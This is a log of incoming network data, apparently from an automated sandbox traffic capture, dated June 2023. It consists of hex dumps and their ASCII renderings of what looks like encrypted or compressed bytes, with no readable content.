                                                                                                  2023-06-06 15:28:28 UTC1865INData Raw: 53 a5 20 95 4d 1d 22 4d f8 fc 82 db 28 45 a1 5a 7b 38 27 6a 2b 55 75 e4 7e 3d 16 c5 00 44 f5 9d 69 f1 ff 6c 11 d1 9a 64 5f 85 1b 8b 64 bc f6 04 8d e2 0f f9 c6 7c 66 d1 3e 6f e6 e8 5a e3 11 04 3d 93 ff 50 11 ce af 13 cb 2e f5 02 3f ba 6a 8a ff 2e 1b 2b 47 94 00 2e e3 99 42 4c 54 2b a8 2c 78 3b 43 5a d2 7d ab 2c 38 0d e6 61 53 11 35 ec 5d fc 02 ee be 32 81 2a ae 9f a8 54 b6 d6 92 4f 06 e7 a2 29 b6 02 e0 45 90 07 88 2c 46 0d cf 67 5c 13 88 9e 51 fb 09 47 b2 ea fe f5 3a c0 fe 2f 6a d9 7c 33 38 62 c0 1e ee a2 7f cd 3b 9c 7e f8 8b 39 95 73 2d 95 70 9d 46 56 ce 3e 1f ea 34 d1 07 a8 fe ed 7c 6a 08 d1 6b 16 bb 34 77 52 5b e3 03 d8 14 8e 1a a6 c4 fc 33 dd c1 db 40 54 3f c4 cf 82 01 ba 64 8b fa aa 3d 89 06 cd 88 ab e8 24 aa 81 6f 90 44 9f 4b 4a 2f ee 4e 19 56 0b 8e
                                                                                                  Data Ascii: S M"M(EZ{8'j+Uu~=Dild_d|f>oZ=P.?j.+G.BLT+,x;CZ},8aS5]2*TO)E,Fg\QG:/j|38b;~9s-pFV>4|jk4wR[3@T?d=$oDKJ/NV
                                                                                                  2023-06-06 15:28:28 UTC1881INData Raw: b2 61 fc c8 3e 86 1a f5 10 3e 4b 74 c1 5e 2f 48 13 a8 75 a5 04 59 bc 79 90 60 82 5a 3c fc 01 6a c3 69 cf 6d 6c b1 b4 ba 0e cf 9e 18 e2 44 71 ff ee 3b 92 46 dc 74 d4 1a 24 0a 3c f5 72 de b8 6e 26 b7 6a b2 ba cd 8e 79 bc 16 98 5d b7 bc ef ef d3 0a 1c 36 a2 8f 28 3e 20 b8 fe 3d 3f f8 09 df 3f 5e 87 c6 c0 92 9d 04 eb 9c 3f ff d4 d4 b3 c7 db 20 a3 8f 08 5b b2 31 07 a9 8a c3 f1 66 9c 54 e0 ab 0d fa 12 01 69 01 55 49 89 73 b9 10 23 3b 03 66 84 23 e0 b1 ca fd 73 b0 a5 8b 37 a5 9e 3a 1f b1 21 47 e0 4d 7f 56 a9 c2 49 f9 5d 29 c4 4f b0 04 50 50 03 12 0e 46 54 04 65 76 13 10 65 83 90 53 a9 62 4f 62 c9 f4 b9 d9 12 19 12 a0 9a 40 45 f9 bd ef e4 2c 38 d7 f0 81 60 42 55 d6 36 89 0d 01 f8 b4 59 f7 92 7e f7 5c 34 76 5e ae f9 26 64 2a c5 b6 d3 1f 0d c8 1b 35 21 fd 1a 46 68
                                                                                                  Data Ascii: a>>Kt^/HuYy`Z<jimlDq;Ft$<rn&jy]6(> =??^? [1fTiUIs#;f#s7:!GMVI])OPPFTeveSbOb@E,8`BU6Y~\4v^&d*5!Fh
                                                                                                  2023-06-06 15:28:28 UTC1897INData Raw: 6e c1 03 84 ad 37 00 83 c5 59 c7 4a 10 52 0f 31 30 91 8d 3a cd b7 5d 97 11 51 76 62 ed ff 7d 28 9a 94 bf 1a e9 99 ec 24 9b 0c 51 10 2a 6f 48 b9 c4 9b dd 41 20 0c 3e 18 b6 bb c3 8c bb ee 4c 46 07 b8 f9 fc 74 6e a5 c5 8f c9 10 45 a9 69 22 c3 6d ef 70 36 d8 57 05 fd 9e 93 86 42 76 f2 b2 5f 56 bc 30 f2 d3 15 bd b7 0f f1 9d 40 4a 7f 81 eb 98 b7 bc c4 8c d7 cc 90 a9 f7 bc 39 02 18 64 91 f3 76 3f b8 01 cd 40 be e5 59 ee 36 d1 b5 dd 01 eb ef ad 9f a0 e7 79 eb 08 42 fa d0 06 84 0c c1 2b 0d 2a 20 34 8b 2b 8a 73 56 8d 98 a7 86 97 fd 53 3d 21 30 32 d4 14 f2 ae 38 a2 61 49 60 c9 55 19 5b a4 13 31 06 56 0d 12 35 d7 e3 06 fb 63 28 4e f9 fb d4 b1 4d b1 a0 7e e4 ed 3d 1f 30 16 e3 1d e3 50 bb b8 73 d8 d9 87 6b 18 d3 e0 8b 22 16 eb b7 30 e5 ae 14 c2 74 e3 ec 8a 89 13 26 b3
                                                                                                  Data Ascii: n7YJR10:]Qvb}($Q*oHA >LFtnEi"mp6WBv_V0@J9dv?@Y6yB+* 4+sVS=!028aI`U[1V5c(NM~=0Psk"0t&
                                                                                                  2023-06-06 15:28:28 UTC1913INData Raw: 21 f6 9b 07 99 78 c5 e3 a5 13 1d d7 ff fd da 2c 8c 0f 0a 06 ed 95 ce 91 dc 51 eb 87 a2 ac 88 3c 6f 1a 89 43 8c 15 14 5b 2a 1e 88 5e 7c 5e 25 c5 e7 80 cc 3b c2 d1 86 94 9c 56 5e ee eb 7b 8e be 4b a5 19 11 f3 c8 49 39 a2 0c 9f fa 6a 40 3b 4f 96 1e 9d 82 d9 67 6f 2d 26 78 ef ca 44 a1 f9 d4 63 98 2f f7 c5 14 e4 8a 7e 49 96 f8 6a 6f 78 39 72 34 c2 4e 40 16 2c 32 06 9c c6 70 74 46 e1 b9 00 85 e9 28 02 54 a1 ec 4f c9 77 3b c2 5a 80 ae bd f1 c3 8d 97 18 54 38 1f 78 2d 1e e5 b4 2f 86 dc a4 cb 83 3c 8f 89 69 82 96 80 99 61 2c 94 05 8e b8 ef 4b 9e 88 8d c0 5e 11 7d 76 4f 29 a2 57 46 72 51 08 89 25 94 37 83 f4 45 9b 3f 93 3f ed 7b bb 79 d1 74 3c 9c c6 35 74 75 91 15 11 e8 9b d3 ab bb 28 b0 59 c1 7a 47 08 58 b2 52 ca 44 38 c8 63 3e 93 b9 b2 72 9a 38 fc 5d e3 13 84 2c
                                                                                                  Data Ascii: !x,Q<oC[*^|^%;V^{KI9j@;Ogo-&xDc/~Ijox9r4N@,2ptF(TOw;ZT8x-/<ia,K^}vO)WFrQ%7E??{yt<5tu(YzGXRD8c>r8],
                                                                                                  2023-06-06 15:28:28 UTC1929INData Raw: 9a 6c 0f b8 9c e9 6f 72 d2 c6 14 a4 5b 96 63 30 bc 3a 2c 6c 8e 7b 59 8d 30 90 7a c5 8f a8 40 40 d8 fb 56 70 f5 43 0d 16 e5 8a 78 39 d0 e5 ba 2b fe c5 55 f9 42 c5 8c c7 57 58 53 08 3a 57 8d 76 9b b8 06 b3 f8 2c a2 23 46 02 2a 16 19 8a 60 04 a2 1c e7 18 61 a8 88 82 d2 84 f2 85 9a 0d ea f6 28 13 c1 00 4f 77 e6 d9 75 00 eb 41 56 bf c4 47 38 c8 44 ae f1 cf 1b 77 5e 39 8f fd 46 00 ca 2e 38 16 ed 09 02 99 99 29 78 f0 d1 5a 2e 8e 10 c2 98 c2 49 8a 9f 3c af 34 83 dd 20 14 95 d7 21 b0 86 ce a4 34 7a 66 a5 ff f0 79 2d a4 52 6e da db a1 91 d1 42 8e 21 13 b8 2e 60 cc bc bb 77 d8 43 c9 86 f6 d8 18 80 54 19 b8 15 7a 62 2d 70 47 5f c3 c5 e3 59 58 3b 32 a9 6a 45 94 81 42 1b 07 98 43 c3 05 00 cb ea e9 41 31 e8 8e 94 02 00 4e d9 ab 6f 96 35 8b df ca ce a7 64 53 45 83 0b 64
                                                                                                  Data Ascii: lor[c0:,l{Y0z@@VpCx9+UBWXS:Wv,#F*`a(OwuAVG8Dw^9F.8)xZ.I<4 !4zfy-RnB!.`wCTzb-pG_YX;2jEBCA1No5dSEd
                                                                                                  2023-06-06 15:28:28 UTC1945INData Raw: d5 7a 7a 0b 26 9a 20 e1 b0 40 0e 43 15 b1 50 ce a6 e8 e6 b2 98 af 92 6f d6 d8 45 5b 80 f7 5d c9 f1 4c a7 24 55 c1 d0 2a 78 b9 b0 10 94 f8 32 fe 58 ac 33 16 a9 25 d8 14 e4 2f 22 06 43 5c e1 40 36 a5 d3 53 6c 99 23 8d 55 48 2f 4c e8 19 c0 7f 29 56 4f 4b 44 26 9e 6b 4a c4 d6 25 6d bd 3a 27 97 d4 00 36 81 27 fd 24 7e fc af 23 07 f2 80 31 5b 60 f5 2c 04 2a 9c 7b 42 42 d2 c0 c5 e2 4d 06 80 f7 bc 1d 7f e7 d0 00 17 b6 71 c0 a2 97 d6 09 ef 46 75 0f 28 94 03 2c 28 17 77 d9 8e 6d d3 35 db 67 4c b3 6e f1 3c 97 dd 7b 66 89 15 cb 6d e4 10 f2 62 40 67 3e a0 a6 2a 86 a0 1c d3 50 fb 83 f5 68 98 81 a7 c4 bd 57 10 8a 0f b6 8f ee 03 0e ac 71 df 09 ff 3d 98 eb 0d e6 ed b2 58 c4 e5 fa 87 95 66 5b da 58 2e b6 58 b0 79 2d 6c 17 5c 59 82 c7 e9 9d 09 96 a4 08 50 fe cd 4b ba 6b 5b
                                                                                                  Data Ascii: zz& @CPoE[]L$U*x2X3%/"C\@6Sl#UH/L)VOKD&kJ%m:'6'$~#1[`,*{BBMqFu(,(wm5gLn<{fmb@g>*PhWq=Xf[X.Xy-l\YPKk[
                                                                                                  2023-06-06 15:28:28 UTC1961INData Raw: fb 55 04 44 fa 9f d0 ee 4b d3 be 92 1a 54 6f 41 84 99 ea 73 cb e5 51 a8 a3 bb 99 88 2c 91 1f 96 58 bf 2b dd b9 7f fe b0 9e 28 b8 3b 0b c6 b4 ad 74 66 29 22 c8 65 af 45 b5 74 49 19 ea 90 43 7a 07 f9 ce 80 92 fc 9b c5 9b 88 92 6b cf 07 ec 35 53 57 e2 78 02 d3 84 93 43 68 77 75 a1 6a 9e c6 07 99 82 1e 8a be 2d 12 24 29 32 87 42 2c f8 4b a5 a2 72 a9 ab a2 98 af 73 19 5e b0 14 e2 7c f8 59 0c 7a c1 8f d4 bd f8 4e 6c 8b bd b2 9b d0 6b 25 eb 72 d6 fc b7 2c 9d 51 8d 4e df 43 54 92 8b 4d 25 0a 44 a8 c9 c0 01 77 f1 51 c9 06 09 35 0f 54 8a 4f ef db 24 17 10 c5 6d b1 59 59 23 37 67 6c 1b 0e 66 30 06 ea ee 87 64 74 8a d5 90 af d8 1b f2 eb 5e ad 28 e6 69 80 4b 2f e1 d4 54 22 55 91 fe f5 a7 c3 ce b1 a4 58 55 d1 1f 25 d9 e9 7b 89 77 df e0 f6 93 7d 97 0c 41 6c 95 19 fa a5
                                                                                                  Data Ascii: UDKToAsQ,X+(;tf)"eEtICzk5SWxChwuj-$)2B,Krs^|YzNlk%r,QNCTM%DwQ5TO$mYY#7glf0dt^(iK/T"UXU%{w}Al
                                                                                                  2023-06-06 15:28:28 UTC1977INData Raw: 00 57 f3 00 09 d0 11 56 cc e0 ba 9e 2b 5a 02 3c 73 02 cb 32 61 62 3c 25 e6 9a e4 e8 5a a7 ac 8a fa 86 ce 18 b1 5a 67 01 e8 e1 95 93 0f 8f d3 6b c1 de db d4 84 08 5d 4d 40 19 24 c5 d1 ef fe 6b 8f 03 04 6e 9b 4d 0f fa af 69 dc 2d ba 0f df f7 9d 62 f8 6a 2a 6b 24 b8 c4 bf 17 e7 ad 73 ce 6a 70 c9 ea e7 a5 27 1d 6f f1 7c 39 21 99 cd b8 21 b5 91 2c be 97 19 b1 aa 4b 64 00 08 d5 0f 88 e9 c8 52 38 3f be 33 37 fb 5a 52 30 18 2a 64 10 12 0a 9b 67 51 1d 61 95 df 9b c8 18 cd 17 f7 64 9a 21 bb e1 62 89 c1 a6 91 10 f3 6d 32 bc 59 5b 1a e2 dc 4f 14 e5 68 1e dd fc e8 e0 ad 33 91 c1 5d a9 47 f0 19 4a 64 5f 2b ef e5 a1 04 7f dc 6d f8 60 67 1c e7 f7 f4 dd 84 31 a9 aa 8d 4b 57 4c 30 9d 59 2e da 8d 56 7d 8c 7d 94 21 0d 7a c4 7e 72 dd d3 2f fd 65 30 5a 90 3b 63 4e d5 05 79 3d
                                                                                                  Data Ascii: WV+Z<s2ab<%ZZgk]M@$knMi-bj*k$sjp'o|9!!,KdR8?37ZR0*dgQad!bm2Y[Oh3]GJd_+m`g1KWL0Y.V}}!z~r/e0Z;cNy=
                                                                                                  2023-06-06 15:28:28 UTC1993INData Raw: 8e 3a b8 d0 6c f5 34 7b 06 8b b3 86 ac 0b 89 80 73 df 3f f3 97 07 d3 df 80 72 46 cf 40 8b b8 42 5e 6e ff 82 91 84 ac 07 50 48 d5 d7 0b 7d 70 94 f8 df a6 ca 4f c7 19 be 4d 1a 39 dc 4d f0 73 33 1f 70 04 33 94 30 24 2e a2 ae 00 a3 9c 01 68 1a cd ba 3c fa da b9 95 67 45 79 1a 7e d2 db b3 ae a4 9a 95 62 a5 12 0c c3 8a d9 1c b2 78 ce a0 61 19 df 7b b5 4f 1e 0c 21 fd c9 50 84 e0 03 34 a1 1a b0 d3 9b c2 b3 36 40 1d fd 0b a3 17 1c 74 ed d8 b2 d0 72 99 d9 51 4f 8e 3d a6 2c a5 93 13 ff b6 fe 3f 89 ab 00 f3 71 db 80 36 fc 02 bd 02 b2 7d c1 fd 47 05 02 31 cd 28 4d 61 f1 16 51 c4 af 6f 6f 16 5b 05 fe dc b7 31 d2 07 c3 a7 5c d8 4d bb b2 2e fc 7d d7 af 9b dc e7 9d 1b 07 dd b2 e1 c5 ab 27 29 92 9f c0 06 1a 08 eb 3f f4 a1 90 9c c4 18 2b 0a 8a e7 e4 c4 05 73 29 0d 23 b1 47
                                                                                                  Data Ascii: :l4{s?rF@B^nPH}pOM9Ms3p30$.h<gEy~bxa{O!P46@trQO=,?q6}G1(MaQoo[1\M.}')?+s)#G
                                                                                                  2023-06-06 15:28:28 UTC2009INData Raw: 71 ac af 69 6c f9 53 50 97 08 ea 70 c1 8a 4e 26 66 63 de 7f 06 00 7a 02 f6 b7 a6 98 07 f6 14 22 2d cb df 3b 08 b4 dd 62 f7 52 58 3c aa 6e 34 43 04 9e 33 fd a6 ec 37 ff 68 8d 2d c5 4d 78 59 9b 8d 14 db 30 fa 31 3c e8 07 dd 4d b2 f8 5e f8 d9 34 17 e3 7d 66 5c ec 20 f2 4f 33 09 01 39 cd e6 a8 26 1b b4 24 d3 d5 cd 17 7c bd bd 55 1a 7b 05 7c 6a a7 b6 5b fa 50 bc fa 5b 21 c2 f0 5c 37 54 66 a8 7a f6 12 40 8f cb 72 72 bd 96 03 f9 cd cd ff a7 08 7b 01 d6 a8 9e 79 ac 30 92 77 f4 4d ba f2 66 3b 0b ad 5e b3 9f d8 07 17 9f 48 06 2f 6d 00 e5 b5 3f b9 89 6b ac 80 85 c2 08 bb aa a0 f8 13 6b 23 6c 24 44 10 e8 64 5c 57 52 31 09 f3 3c 9d 35 a0 42 5c 48 a4 50 85 4a af 24 c1 3b ab bf 00 7d 80 99 29 48 93 6c fd 6b 57 57 c7 2c 68 ba 10 ba 1c 50 dc 26 44 d6 5f 99 0e 0e 9c e8 32
                                                                                                  Data Ascii: qilSPpN&fcz"-;bRX<n4C37h-MxY01<M^4}f\ O39&$|U{|j[P[!\7Tfz@rr{y0wMf;^H/m?kk#l$Dd\WR1<5B\HPJ$;})HlkWW,hP&D_2
                                                                                                  2023-06-06 15:28:28 UTC2025INData Raw: 11 e8 08 ab b1 6b f2 de 53 4f e6 6f 26 86 32 51 c4 1e 04 06 2a 87 cd 47 3d 0b 47 6b de 4d 48 5b 0d 26 ee 2c 3a 38 44 5e 2c 22 13 e7 2c a3 cf e8 cd 46 0a 2e db d7 14 a7 d1 81 a5 3d 52 9e 6d ed 9a 31 b1 61 34 0a 18 41 5e f1 39 a1 7c 11 78 62 49 07 6d bf ee 3d 83 73 32 69 e2 48 91 f8 9c 9e b1 2c 57 85 8c 4f d6 da 3f 8c 05 38 eb 74 f0 e6 4f e0 ca 03 d6 0c cb b3 e2 e4 a9 e9 5e d4 a9 18 3f 16 50 43 59 85 27 61 8e 43 2f 9d f4 f9 d3 2c d3 45 78 17 55 ed 10 48 86 87 16 c2 ee 36 a4 e9 66 73 39 cf 20 f4 21 69 98 b8 dd 52 4b bc 1c db ae 95 03 f1 fa cd 60 4f 31 a2 8c 62 87 79 e8 4b 2b 9e 98 c7 48 17 97 6b 82 f0 6c 27 2b c3 e3 bf 79 0f c9 cf 56 de 87 18 8e 57 24 bf 4b 4b e7 5c 7d 60 21 ad ca 0e 3c 04 37 27 dd ef 9a 20 9d e6 dd 76 a8 c7 f6 8c 33 5e 8f 57 02 66 11 03 4f
                                                                                                  Data Ascii: kSOo&2Q*G=GkMH[&,:8D^,",F.=Rm1a4A^9|xbIm=s2iH,WO?8tO^?PCY'aC/,ExUH6fs9 !iRK`O1byK+Hkl'+yVW$KK\}`!<7' v3^WfO
                                                                                                  2023-06-06 15:28:28 UTC2041INData Raw: de 8b 8b bd c3 7c 0c 4b 1c f7 da 7a f6 9c 69 5a 95 a1 4f f8 ce 20 38 92 cd df ea ed 37 ea 5c e3 cf 42 0b 77 b8 12 0f 3b 24 61 68 40 4f 63 0c 33 03 9a 97 28 85 55 3f 30 23 32 37 83 91 19 35 34 c7 c2 f6 20 62 6c 0e cf 09 41 cd bd 08 cc a9 fd 70 dd a0 60 e9 fd 08 cc 8d 94 e8 25 6b c6 41 b5 6f c4 fc 9b bf 01 7e f2 b5 3a 07 28 fb 32 5d af 41 17 a0 ad 28 af 2b d1 d5 26 24 12 92 a3 07 e4 70 35 c8 ee 60 93 bb 3c d9 9e e8 dd f7 71 87 f9 f6 d4 da 89 92 63 66 62 e8 09 40 d5 ab fe b0 0a 21 90 78 a9 b5 86 b7 9b 13 86 e2 a3 e4 9b af 6f 8f 16 cf f2 5a 52 9e 39 6c 90 2f 00 c4 98 a6 17 61 b9 94 cb bc 1b 4b 22 d6 ff a5 51 bd 82 ad 7e 9a 9c 08 87 08 e1 27 66 b3 c4 de 4a 10 c5 9d ce 32 a1 14 af 38 49 da d6 53 b5 4b 3c 9e 0a b6 ef 76 0c f3 1f b0 1f 7d 23 27 d1 28 b9 89 20 c2
                                                                                                  Data Ascii: |KziZO 87\Bw;$ah@Oc3(U?0#2754 blAp`%kAo~:(2]A(+&$p5`<qcfb@!xoZR9l/aK"Q~'fJ28ISK<v}#'(
                                                                                                  2023-06-06 15:28:28 UTC2057INData Raw: 1f 78 a0 dd 72 cd 47 41 24 c6 a9 29 41 2e 0f 0a a7 89 fd 12 b2 15 e3 81 d0 3c 67 93 89 e6 1f 27 72 47 d4 f1 20 71 b9 fd 3a 8a 84 cf 55 24 5b 50 cc a9 7e 5c fb a2 79 31 c0 e0 bb 34 02 98 b3 f2 7e 4e f4 02 67 f5 06 dc 36 84 7b 9d 25 51 36 dd b5 fc ed 93 cb 92 9e f5 a5 1d 67 a4 03 a0 ef 79 20 70 73 a6 95 3c 91 0d 26 77 76 c7 55 ab e3 a8 a5 93 27 63 a5 60 91 ee a7 e4 58 56 a5 85 b4 39 62 9d c7 74 01 06 ec 6c b2 94 4c 2b 45 4a f3 ee 2e 2a 5b d2 d9 1b 74 67 ce 57 70 b9 ca 86 f4 36 20 b0 c6 c3 8e f5 93 a5 1b 6f cb 92 f3 ba 7a 80 a3 e5 0b ef be 1f 8a d1 97 22 e0 fa 39 37 5d f7 67 d9 3b 8a 25 c0 55 d4 72 08 07 1b 61 12 fb c8 cf c8 48 70 4c 21 00 b6 e3 0d 55 9f 6f b6 ea ed 07 44 3e 70 29 2b 5f db dd 74 a0 ab b4 4f f9 17 eb 7c c2 2c 39 b7 48 b2 ae ac 28 85 67 a4 17
                                                                                                  Data Ascii: xrGA$)A.<g'rG q:U$[P~\y14~Ng6{%Q6gy ps<&wvU'c`XV9btlL+EJ.*[tgWp6 oz"97]g;%UraHpL!UoD>p)+_tO|,9H(g
                                                                                                  2023-06-06 15:28:28 UTC2073INData Raw: 6d 07 49 06 49 3b d0 c6 38 42 65 15 4e 7d 47 63 08 08 8c ff 91 82 6f d2 bc 31 56 5b 6e cd df a9 43 f9 b1 e9 1d da 79 b2 0e 7a 82 15 ee e6 ec 29 4d ee cc 9c 50 76 17 6b 58 fe 49 0b cf fa 34 9b cb ec 3b 1d 51 80 f8 f8 d1 f0 7d fd 64 a6 62 84 12 d6 91 0d d2 95 32 6b c6 53 e3 27 cc 11 56 25 2e 31 0a 99 9f 72 8f 06 b9 f6 0c af 8e 52 ae 40 bb 75 c7 39 8d 3e 74 7d a6 c9 2b d8 87 aa 64 de 14 37 49 3c 33 b9 6a 23 6e 56 bf bd 19 43 2e 3e b5 0e d2 6c 9f 8a a9 7a 6e 34 0f b5 c4 14 09 4c fc 52 95 c3 fd 35 53 c2 fc 81 3a 94 e4 18 8b fa f2 b4 a2 ef 08 5e 9f 21 bc 61 aa 44 56 b1 c8 8c cb 58 8b 32 e4 a0 47 44 72 3a 39 a2 74 6b db 26 88 3f fb 7a d8 76 3e c3 16 79 28 44 61 d9 1e bf 3f d4 4d f7 db c0 a9 2a af 35 67 37 e0 78 56 00 11 65 9a a1 4e c0 97 06 c5 78 94 c7 64 a5 a4
                                                                                                  Data Ascii: mII;8BeN}Gco1V[nCyz)MPvkXI4;Q}db2kS'V%.1rR@u9>t}+d7I<3j#nVC.>lzn4LR5S:^!aDVX2GDr:9tk&?zv>y(Da?M*5g7xVeNxd
                                                                                                  2023-06-06 15:28:28 UTC2089INData Raw: 08 f7 77 4f 99 0b 88 0e af c0 10 a1 79 38 92 99 78 d1 ca 4a 95 48 aa a7 42 d9 73 ab 18 24 bb d4 3c 9e b4 a3 90 70 fc cc 68 ce df 25 6f cf a8 ad 57 e7 fe 12 95 70 d4 d0 22 6e 5e a8 4e 8b a0 1c 9c b3 4c 0c a4 ca b7 d6 30 64 0b 39 b4 c3 b1 83 f3 d3 2c 77 ca 03 8f ce c4 e1 e2 16 62 53 b7 36 de 9f bc da 5f db 01 4b f5 16 28 26 46 96 62 d9 4f c2 d2 27 dc 84 8f 6b 62 20 9a 32 9b 57 a2 89 20 06 6a 9c c7 99 9b 45 ef 8d 44 86 1b 06 11 90 e0 35 8d 8f 42 bf eb 46 6f 3b 03 34 50 c1 7d 9c 2d b5 de f6 f0 74 a0 2e fa bd 05 e5 e8 3e aa ca db b9 e8 ac 9c 82 e3 b0 c5 67 13 d5 77 15 b4 a0 72 52 cd 92 4d 30 13 fd 75 44 01 1b 00 94 28 04 88 75 bb c8 78 9b 5a 04 87 d1 f5 6d 67 6f db 1f 58 39 ca 90 87 56 bb 19 0e fc a2 4b a3 19 c3 d5 79 ab 02 02 fb 30 75 76 48 d6 8f 76 04 35 9a
                                                                                                  Data Ascii: wOy8xJHBs$<ph%oWp"n^NL0d9,wbS6_K(&FbO'kb 2W jED5BFo;4P}-t.>gwrRM0uD(uxZmgoX9VKy0uvHv5
                                                                                                  2023-06-06 15:28:28 UTC2105INData Raw: 0b c6 4c 79 d6 c5 0c 19 6c cc e9 0a 62 d6 33 1a 92 4c ee 5b 8e ba a7 49 cf 14 16 54 66 a8 a1 b4 3c 3d 71 cd b9 47 7f 3d d0 50 47 05 04 50 62 29 37 65 f8 b3 03 ec fb 52 fa 15 33 de f1 2c 87 19 20 93 2c 89 6e 9c 39 1f c0 44 78 80 df d6 27 63 51 28 69 88 22 62 03 46 4d 89 36 bc 3b e3 33 f3 7c 1e b6 7e 04 a8 22 64 b5 61 48 c2 fb b8 eb 7a 9d f9 3b a9 f6 7c 42 84 1a 80 99 93 5d 4d 8b 04 85 64 cf 4c e0 03 5a 0b 5b a0 4e 45 2f e6 55 74 24 95 c4 ca ea 7d 4a 26 32 75 0b 02 ba 9e 8b d1 6c f3 26 0c 6f 50 86 28 95 7c 53 d0 ea a9 45 65 33 8d c0 77 1f f2 42 92 f8 e1 32 57 1a 41 38 b9 d5 19 e3 54 32 f1 3f 8c da 41 05 1c 8f 91 24 56 3c 6c d8 25 47 cb 6e ac 82 69 b8 38 12 31 01 b0 0d 50 70 f1 a9 3d d0 44 13 2a 4e 55 76 48 2a 34 8c a4 d9 10 d7 90 59 3d f3 27 f8 c3 08 ca 78
                                                                                                  Data Ascii: Lylb3L[ITf<=qG=PGPb)7eR3, ,n9Dx'cQ(i"bFM6;3|~"daHz;|B]MdLZ[NE/Ut$}J&2ul&oP(|SEe3wB2WA8T2?A$V<l%Gni81Pp=D*NUvH*4Y='x
                                                                                                  2023-06-06 15:28:28 UTC2121INData Raw: 92 b5 a7 36 a1 29 2e b5 fb 06 8d 2b b1 95 3d aa 59 fb f2 d7 44 9f ba b2 54 6f f9 5b ab 67 81 72 96 2c 1e 9e 56 07 ad d8 b7 4c a5 fb 90 1d d2 4c 00 78 8a 80 2e 2c 49 1b fe 61 eb 25 c8 92 57 8e 60 c0 f7 2b c7 37 4b ce c7 bd 2b 66 a7 2d 0f f8 2f a8 ae 50 85 97 57 0d 27 f3 8a 92 c6 d9 9f 59 41 bb 1c 66 a3 1b 98 c5 d2 96 e5 4d 26 5d 7f 22 16 bc 87 69 33 b9 be 41 6f a3 60 09 db a5 b5 87 72 bc 25 d9 4e 57 f1 d5 56 83 95 00 42 dd 6b 4a 6a d3 80 3f b0 b4 9a 0f 9b 68 47 03 7e 90 09 d0 7e 3a 83 d1 ac bc 66 03 7a 30 96 af 91 73 79 8d 71 9a a2 60 96 38 51 19 be e0 56 9f 03 15 1a 6c 56 80 43 d4 c2 bf f2 54 32 a5 81 9a 51 ee c9 8f 2e 1f 21 f9 8b ed 6b 3a 0e b2 1b a7 32 6f d4 d1 5b 6d e8 71 9a 4c fd 3f 1c e5 c4 59 bc e7 c6 9a a4 c8 a5 73 7c c6 b6 03 07 db 6e 36 38 d7 79
                                                                                                  Data Ascii: 6).+=YDTo[gr,VLLx.,Ia%W`+7K+f-/PW'YAfM&]"i3Ao`r%NWVBkJj?hG~~:fz0syq`8QVlVCT2Q.!k:2o[mqL?Ys|n68y
                                                                                                  2023-06-06 15:28:28 UTC2137INData Raw: 04 1a ea e6 86 a8 83 98 17 a0 72 24 b1 e9 82 ec ad e6 a6 11 4f b0 42 63 de 63 d5 99 10 7b dd 68 1a 12 e1 d1 5e 35 df 2b 80 1d c9 31 2b 14 12 54 24 fd 70 b6 2c 80 57 f5 77 71 b8 3f b4 f4 59 c5 b9 2c bb cd ec d3 79 c0 a3 08 eb 04 e0 8b 56 db bf 56 0f 8e 35 48 38 f2 71 a1 de ec 28 a9 0a 96 ed ee ef 9a fe 29 5a 2c 64 8b 27 8b 24 f6 41 54 00 ce 6a 91 1d 32 29 eb f0 19 dc e8 fc c2 ad 16 fd 28 fe 8c c4 03 bd 24 05 28 08 70 ff d4 b1 0d 17 75 e4 be a1 93 b2 2c 32 9b e0 1c 35 a3 97 0c 6d 2b 29 9d a0 12 28 b9 26 c2 f0 76 05 05 95 c3 5c 4d ad 1e e4 97 fa 61 3d ae 08 57 ee 3b a4 92 35 39 55 f2 04 25 d1 16 46 02 92 c9 88 68 8f fc ca 6f c0 71 97 54 c5 56 62 28 80 14 25 6d fe c6 05 20 29 51 3e 6e 43 04 5e 39 b5 9b b4 2c 6e 50 76 5f 83 b8 af 8a 52 cf 2b fe 70 54 71 da e5
                                                                                                  Data Ascii: r$OBcc{h^5+1+T$p,Wwq?Y,yVV5H8q()Z,d'$ATj2)($(pu,25m+)(&v\Ma=W;59U%FhoqTVb(%m )Q>nC^9,nPv_R+pTq
                                                                                                  2023-06-06 15:28:28 UTC2153INData Raw: a9 0f 27 d1 46 bb da 85 a2 4e f8 b9 02 ff de ed ae 43 79 99 3b 4c e1 af 4e 50 cb f1 42 46 40 94 5c 85 56 a1 26 14 52 8b de 00 b6 09 39 ab 80 ec c3 59 2d 75 30 20 38 f1 5e 97 9a 65 1c cf 36 1c 94 9e 03 12 2f f0 44 4c c1 0a 78 4f 4d 91 11 66 9f 2b bc ae 71 65 37 d2 4f 75 cc 89 bb 7b b0 da 6d 87 4d b1 86 8b 80 f9 85 2d e0 29 f8 71 2a 0a 44 4f 0c 49 83 c3 c8 0a 7a 31 0b 3c 4c e7 83 a8 d0 6e f6 74 73 d3 c2 de 7d d2 92 f4 91 7f d7 24 54 3a fc 34 3e 18 35 6d b3 fb ad 1d 77 eb de 65 2b e4 66 20 20 2a e5 04 77 0d 88 af c2 be ad 3b 7f 32 10 c7 f8 d4 33 ab 40 52 4b a9 27 e3 55 4a 44 da 26 79 3e 42 64 9f 30 de 50 d8 96 4c ca 45 39 0e 78 6d be ec 7a 74 43 19 e1 0f 64 3e 7f d9 2b 23 fb 9d 42 4a 54 e4 42 cc c6 50 92 e3 af 75 80 d8 49 a2 7c 60 41 52 8c f2 2b c6 a2 26 f4
                                                                                                  Data Ascii: 'FNCy;LNPBF@\V&R9Y-u0 8^e6/DLxOMf+qe7Ou{mM-)q*DOIz1<Lnts}$T:4>5mwe+f *w;23@RK'UJD&y>Bd0PLE9xmztCd>+#BJTBPuI|`AR+&
